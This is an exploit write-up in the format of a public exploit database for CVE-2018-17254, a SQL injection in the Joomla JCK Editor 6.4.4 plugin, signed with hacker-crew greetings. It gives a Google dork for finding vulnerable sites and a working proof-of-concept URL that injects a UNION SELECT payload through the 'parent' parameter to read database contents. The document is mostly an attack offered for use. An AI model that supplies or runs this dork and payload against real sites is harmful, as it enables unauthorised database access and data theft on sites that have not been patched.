# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection> # Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/ # Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor # Version: 6.4.4 # Tested on: Debian 10 Ubuntu Windows 11/10 # CVE : CVE-2018-17254 # PHP version (exploit): 7.3.27 # POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa Preference : https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254
Greettzz LXPLOIT - CUKIMAY CYBER TEAM My Friends : Noniod7 - Ardzz Recoded from : Hamza Megahed https://www.bloglumajangteamsec.my.id/2023/01/cve-2018-17254-eksploitasi.html